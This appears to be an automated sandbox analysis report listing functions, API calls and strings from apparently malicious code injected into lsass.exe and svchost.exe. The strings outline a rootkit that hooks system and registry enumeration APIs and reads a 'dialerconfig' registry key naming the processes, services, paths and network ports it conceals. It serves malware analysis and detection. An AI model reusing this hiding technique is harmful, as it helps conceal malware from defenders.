\\.\pipe\, xrefs: 00000261AC9025CE

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: bc0bbcd928978f354d62f8b08008e5709131040d208fe549614c983724066030
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 9E510E32206B81C1E6749EA9975C37E6795F3857A8F5D4026CD4903F9ACE37ED21CB40

Function 00000261AC910604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000261AC91071B
GetLastError.KERNEL32 ref: 00000261AC91073D

Strings

U, xrefs: 00000261AC9106C7

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 7683cc5ed04c8e35fd09b651937c666d3b3d2794972103e17cb144a6e1373940
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 0741B232316B40C5EB60DF65E9493AA77A0F3C8BD8F484129EE4D87788DB3AD911CB40

Function 00000261AC9094A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000261AC9094E8
RaiseException.KERNEL32 ref: 00000261AC90952E

Strings

csm, xrefs: 00000261AC90951B

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: a5c75ae3dd82ba6c4337143e328fc8557f43a0959b80902c9fd2485e7acef711
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 8C114C32209B80C2EB608F15E5442597BA4F788BA8F5D4224DF8D07B68DF39DD61CB00

Function 00000261AC901D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000261AC901D9B
HeapAlloc.KERNEL32 ref: 00000261AC901DAA
GetProcessHeap.KERNEL32 ref: 00000261AC901E1E
HeapFree.KERNEL32 ref: 00000261AC901E2C

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 74932e0283a2c71fab83ba2a11ce92d591547364baf8ceeb3335838a3e95af85
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: F621B872606B80C1EB518F99F50825AF7A4FBC4BA8F5D4114DE8C47B14EF79D962C700

Function 00000261AC901274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000261AC90127A
HeapAlloc.KERNEL32 ref: 00000261AC901289
GetProcessHeap.KERNEL32 ref: 00000261AC9012A3
HeapAlloc.KERNEL32 ref: 00000261AC9012B4

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 9febc9d902099fdd90ab40fd79bdbe869aa8fefa1b12d3ce2ae1fbb4bad40dcc
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 07E039F1612700C6E7448BAAD8093493AE5FB88B25F88C028C90907350DF7E99A9C740

Analysis Process: svchost.exePID: 1080, Parent PID: 8464COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	74
Total number of Limit Nodes:	2

Executed Functions

Function 000001F027611274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F02761127A
HeapAlloc.KERNEL32 ref: 000001F027611289
GetProcessHeap.KERNEL32 ref: 000001F0276112A3
HeapAlloc.KERNEL32 ref: 000001F0276112B4

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 39f72e20338487d9092e3fc25642065dbba9278f3e93ce9d145107bc3186d57d
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 9AE0C97171160186EB469B67D81C3A976E1FB8CB51F498024CD490B352DF7D8499CB60

Function 000001F027613458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001F02761347A
PathFindFileNameW.SHLWAPI ref: 000001F027613489

Part of subcall function 000001F027613930: StrCmpNIW.SHLWAPI ref: 000001F027613948

Part of subcall function 000001F027613878: GetModuleHandleW.KERNEL32 ref: 000001F027613886
Part of subcall function 000001F027613878: GetCurrentProcess.KERNEL32 ref: 000001F0276138B4
Part of subcall function 000001F027613878: VirtualProtectEx.KERNEL32 ref: 000001F0276138D6
Part of subcall function 000001F027613878: GetCurrentProcess.KERNEL32 ref: 000001F0276138F4
Part of subcall function 000001F027613878: VirtualProtectEx.KERNEL32 ref: 000001F027613915

CreateThread.KERNEL32 ref: 000001F0276134D7

Part of subcall function 000001F027611EB4: GetCurrentThread.KERNEL32 ref: 000001F027611EBF

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 769ff223f1963380d71eaf2fa166587c6c99db784503e7904508fb420e2c2aaa
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: DF11277061461382FFA397A6A80E7F92694BB5C704F8840359E1A852A7EF3DC0488630

Function 000001F027611C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001F027611650: GetProcessHeap.KERNEL32 ref: 000001F02761165B
Part of subcall function 000001F027611650: HeapAlloc.KERNEL32 ref: 000001F02761166A
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276116DA
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611707
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611721
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611741
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F02761175C
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F02761177C
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611797
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276117B7
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276117D2
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276117F2

Sleep.KERNEL32 ref: 000001F027611C43
SleepEx.KERNELBASE ref: 000001F027611C49

Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F02761180D
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F02761182D
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611848
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611868
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611883
Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276118A3
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276118BE
Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276118C8

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 50832f6ef237f11418c790ed9e53513f4c61cb160201ef3ddb8a3aa0734b5c08
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 1231A875600A0391FF9A9B76DA5D3FA12A5BB4CBD0F9850319E0D87797EF24C8608270

Function 000001F027613930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000001F027613948

Strings

dialer, xrefs: 000001F027613941

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: df55c6c6731c03e2e4e3cd3c9bb31517775ad4e6391b751aad1d032fdb346e55
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: E6D05E3031120BC6FF569FA2888D2B02350BB18705F8880318E0642216E7188D8DC720

Function 000001F0275E2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001F0275E2A31

Memory Dump Source

Source File: 0000001C.00000002.12793830087.000001F0275E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0275E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f0275e0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: b768088d5cb631ebd83b3f2aa9c734cd0d06b688a7f2e516d608a0a0ad7de0db
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 4D61F232701A6287EF69CF1594487BEF396FB0CBA4F148025DA590778ADBB8D952C720

Non-executed Functions

Function 000001F027612CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001F027612D80
lstrlenW.KERNEL32 ref: 000001F027612FBA

Part of subcall function 000001F027611A14: OpenProcess.KERNEL32 ref: 000001F027611A3A
Part of subcall function 000001F027611A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001F027611A58
Part of subcall function 000001F027611A14: PathFindFileNameW.SHLWAPI ref: 000001F027611A67
Part of subcall function 000001F027611A14: lstrlenW.KERNEL32 ref: 000001F027611A73
Part of subcall function 000001F027611A14: StrCpyW.SHLWAPI ref: 000001F027611A86
Part of subcall function 000001F027611A14: CloseHandle.KERNEL32 ref: 000001F027611A94

GetProcAddress.KERNEL32 ref: 000001F027612D95

Part of subcall function 000001F027611554: StrCmpIW.SHLWAPI ref: 000001F027611585

Part of subcall function 000001F027613930: StrCmpNIW.SHLWAPI ref: 000001F027613948

StrCmpNIW.SHLWAPI ref: 000001F027612DD8
lstrlenW.KERNEL32 ref: 000001F027612F00

Strings

ntdll.dll, xrefs: 000001F027612D79
NtQueryObject, xrefs: 000001F027612D8B
\Device\Nsi, xrefs: 000001F027612DCB

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: f6131495e4c769c1b20a3c331423c4b879ffc5ddb51f1cf99c6df2edd86c0d33
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: D6B18E7231069289EF968F26D54C7FA63A4F748B84F985036EE0E53796DB35CC40C760

Function 000001F027617E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F027617E8C
RtlCaptureContext.NTDLL ref: 000001F027617EB9
RtlLookupFunctionEntry.NTDLL ref: 000001F027617ED3
RtlVirtualUnwind.NTDLL ref: 000001F027617F14
IsDebuggerPresent.KERNEL32 ref: 000001F027617F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F027617F89
UnhandledExceptionFilter.KERNEL32 ref: 000001F027617F94

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 15ed293c735d76768479c66e754ad9ad9ea3a81ea838c95b174616b00e7f1b4f
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: AA314372205B8299EF619F61E8587ED7364F748744F44442ADA4D47B9AEF38C648C720

Function 000001F02761B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F02761B585
RtlLookupFunctionEntry.NTDLL ref: 000001F02761B59D
RtlVirtualUnwind.NTDLL ref: 000001F02761B5D8
IsDebuggerPresent.KERNEL32 ref: 000001F02761B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F02761B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001F02761B626

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 4291e19c413e1b04934ccdcbfb04809494e4f2cc8789d4055f33ab3e578f558c
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 5C314D32214B8286DB61CF25E85C3EE73A4F78C754F940126EA9D43BAADF38C655CB50

Function 000001F02761FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F02761FF67
WriteFile.KERNEL32 ref: 000001F02762021E
WriteFile.KERNEL32 ref: 000001F027620270
GetLastError.KERNEL32 ref: 000001F027620372
GetLastError.KERNEL32 ref: 000001F0276203D2

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 9c6316af1d12b76cc817c7afe1137a84c7276347d9324f9a4433d6be8c28b810
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 84E1DF32708A829AEB42CF65D58C2ED7BB1F3497C8F544126EE4E57B9ADB34C41AC710

Function 000001F027611650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F02761165B
HeapAlloc.KERNEL32 ref: 000001F02761166A

Part of subcall function 000001F027611274: GetProcessHeap.KERNEL32 ref: 000001F02761127A
Part of subcall function 000001F027611274: HeapAlloc.KERNEL32 ref: 000001F027611289
Part of subcall function 000001F027611274: GetProcessHeap.KERNEL32 ref: 000001F0276112A3
Part of subcall function 000001F027611274: HeapAlloc.KERNEL32 ref: 000001F0276112B4

RegOpenKeyExW.ADVAPI32 ref: 000001F0276116DA
RegOpenKeyExW.ADVAPI32 ref: 000001F027611707
RegCloseKey.ADVAPI32 ref: 000001F027611721
RegOpenKeyExW.ADVAPI32 ref: 000001F027611741
RegCloseKey.ADVAPI32 ref: 000001F02761175C
RegOpenKeyExW.ADVAPI32 ref: 000001F02761177C
RegCloseKey.ADVAPI32 ref: 000001F027611797
RegOpenKeyExW.ADVAPI32 ref: 000001F0276117B7
RegCloseKey.ADVAPI32 ref: 000001F0276117D2
RegOpenKeyExW.ADVAPI32 ref: 000001F0276117F2
RegCloseKey.ADVAPI32 ref: 000001F02761180D
RegOpenKeyExW.ADVAPI32 ref: 000001F02761182D
RegCloseKey.ADVAPI32 ref: 000001F027611848
RegOpenKeyExW.ADVAPI32 ref: 000001F027611868
RegCloseKey.ADVAPI32 ref: 000001F027611883
RegOpenKeyExW.ADVAPI32 ref: 000001F0276118A3
RegCloseKey.ADVAPI32 ref: 000001F0276118BE
RegCloseKey.ADVAPI32 ref: 000001F0276118C8

Part of subcall function 000001F0276112C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001F027611326
Part of subcall function 000001F0276112C8: GetProcessHeap.KERNEL32 ref: 000001F027611334
Part of subcall function 000001F0276112C8: HeapAlloc.KERNEL32 ref: 000001F027611345
Part of subcall function 000001F0276112C8: RegEnumValueW.ADVAPI32 ref: 000001F0276113A1
Part of subcall function 000001F0276112C8: GetProcessHeap.KERNEL32 ref: 000001F0276113E9
Part of subcall function 000001F0276112C8: HeapAlloc.KERNEL32 ref: 000001F0276113F7
Part of subcall function 000001F0276112C8: GetProcessHeap.KERNEL32 ref: 000001F02761141B
Part of subcall function 000001F0276112C8: HeapFree.KERNEL32 ref: 000001F027611429
Part of subcall function 000001F0276112C8: lstrlenW.KERNEL32 ref: 000001F027611432
Part of subcall function 000001F0276112C8: GetProcessHeap.KERNEL32 ref: 000001F027611440
Part of subcall function 000001F0276112C8: HeapAlloc.KERNEL32 ref: 000001F02761144E

Strings

tcp_local, xrefs: 000001F027611826
paths, xrefs: 000001F0276117B0
udp, xrefs: 000001F02761189C
SOFTWARE\dialerconfig, xrefs: 000001F0276116BA
startup, xrefs: 000001F0276116FD
process_names, xrefs: 000001F027611775
tcp_remote, xrefs: 000001F027611861
pid, xrefs: 000001F02761173A
service_names, xrefs: 000001F0276117EB

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 03792473218b70d612c775944d86514a25ea7c43e4b840cb06cd7911a1fddba7
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 01710736710A5286EF629F66E89C6E927A4FB8CB88F445131DE4D47B6ADF38C444C720

Function 000001F0276112C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F027611326
GetProcessHeap.KERNEL32 ref: 000001F027611334
HeapAlloc.KERNEL32 ref: 000001F027611345
RegEnumValueW.ADVAPI32 ref: 000001F0276113A1

Part of subcall function 000001F027611554: StrCmpIW.SHLWAPI ref: 000001F027611585

GetProcessHeap.KERNEL32 ref: 000001F0276113E9
HeapAlloc.KERNEL32 ref: 000001F0276113F7
GetProcessHeap.KERNEL32 ref: 000001F02761141B
HeapFree.KERNEL32 ref: 000001F027611429
lstrlenW.KERNEL32 ref: 000001F027611432
GetProcessHeap.KERNEL32 ref: 000001F027611440
HeapAlloc.KERNEL32 ref: 000001F02761144E
StrCpyW.SHLWAPI ref: 000001F027611470
GetProcessHeap.KERNEL32 ref: 000001F027611485
HeapFree.KERNEL32 ref: 000001F027611493

Strings

d, xrefs: 000001F027611365

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: d47a3d791a350b908488e5ae454f5aea9f87ecf6f8a38f24742ab4d805b48a9d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 71515C72214B4693EB56CF62E54C3AAB3A1F78CB84F488135DE8907B16EF38C555CB50

Function 000001F027611EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001F027611EBF

Part of subcall function 000001F027612174: GetModuleHandleA.KERNEL32 ref: 000001F02761218C
Part of subcall function 000001F027612174: GetProcAddress.KERNEL32 ref: 000001F02761219D

Part of subcall function 000001F027615C10: GetCurrentThreadId.KERNEL32 ref: 000001F027615C4B

Strings

EnumServiceGroupW, xrefs: 000001F027611F90
NtQuerySystemInformation, xrefs: 000001F027611EE5
ntdll.dll, xrefs: 000001F027611ECD
NtQueryDirectoryFileEx, xrefs: 000001F027611F3C
NtResumeThread, xrefs: 000001F027611F02
sechost.dll, xrefs: 000001F027611FD9
advapi32.dll, xrefs: 000001F027611F97, 000001F027611FB8
EnumServicesStatusExW, xrefs: 000001F027611FB1, 000001F027611FD2
NtEnumerateValueKey, xrefs: 000001F027611F76
NtEnumerateKey, xrefs: 000001F027611F59
NtQueryDirectoryFile, xrefs: 000001F027611F1F
NtDeviceIoControlFile, xrefs: 000001F027611FF6

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 693e1f981722661cf4da3a3027a43db2bffa43d9984e210e4aaba8c9aa48a896
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 51319A74610A4BA4FF87EBA5EC5E6F52320BB4C344FC144339E1D026679F798649CBA0

Function 000001F0276123F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F027612405
GetCurrentProcessId.KERNEL32 ref: 000001F02761240F

Part of subcall function 000001F0276119AC: OpenProcess.KERNEL32 ref: 000001F0276119CA
Part of subcall function 000001F0276119AC: IsWow64Process.KERNEL32 ref: 000001F0276119E0
Part of subcall function 000001F0276119AC: CloseHandle.KERNEL32 ref: 000001F0276119FB

CreateFileW.KERNEL32 ref: 000001F027612468
WriteFile.KERNEL32 ref: 000001F027612490
ReadFile.KERNEL32 ref: 000001F0276124AF
CloseHandle.KERNEL32 ref: 000001F0276124B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001F027612438
\\.\pipe\dialerchildproc32, xrefs: 000001F02761243F

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 7741450e065e8c070e5601b2aab8bffcf0e757305a8ad3b7cd0466bad59d375f
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 8F21303571464282FB518B25E54C3AA73A0F789BA4F544225DE5902FAACF3CC149CF10

Function 000001F02761D2CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 000001F02761D424

Strings

ext-ms-, xrefs: 000001F02761D3A4
api-ms-, xrefs: 000001F02761D391

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$ext-ms-
API String ID: 190572456-537541572
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: c1366c288c4058e876ec296a9402a66f520ce18337676196249ae6a1c7949db9
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: ED41AC71311A4281FF67CF57A80C7F96391BB0DBD0F9845369D1D8B796EB38D40A8260

Function 000001F02761104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

